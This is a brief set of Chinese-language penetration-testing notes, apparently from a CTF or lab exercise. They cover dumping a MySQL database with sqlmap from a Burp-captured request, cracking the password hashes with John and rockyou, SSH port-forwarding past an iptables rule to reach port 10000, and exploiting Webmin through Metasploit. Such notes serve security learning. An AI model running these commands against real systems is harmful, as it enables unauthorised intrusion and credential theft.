sqlmap -r xxx.txt –dbms=mysql –dump
1.知道数据库类型
2.bp抓一个有输入的包
3.输入命令
得到的密码hash用john解密:
sudo john xxx.txt -wordlist=rockyou.txt -format=Raw-SHA256
使用 SSH 隧道,我们可以(本地)向我们公开端口!
从我们的本地计算机运行ssh -L 10000:localhost:10000 <username>@<ip> 相当于访问本地10000端口相当于访问目标主机10000端口。不然,一般情况下会被fw拦截(在本例子中,iptables有规则)
然后在msf那
msfconsole
search webmin
use 4
set …
set SSL false
show payloads
set payload 5
set…
run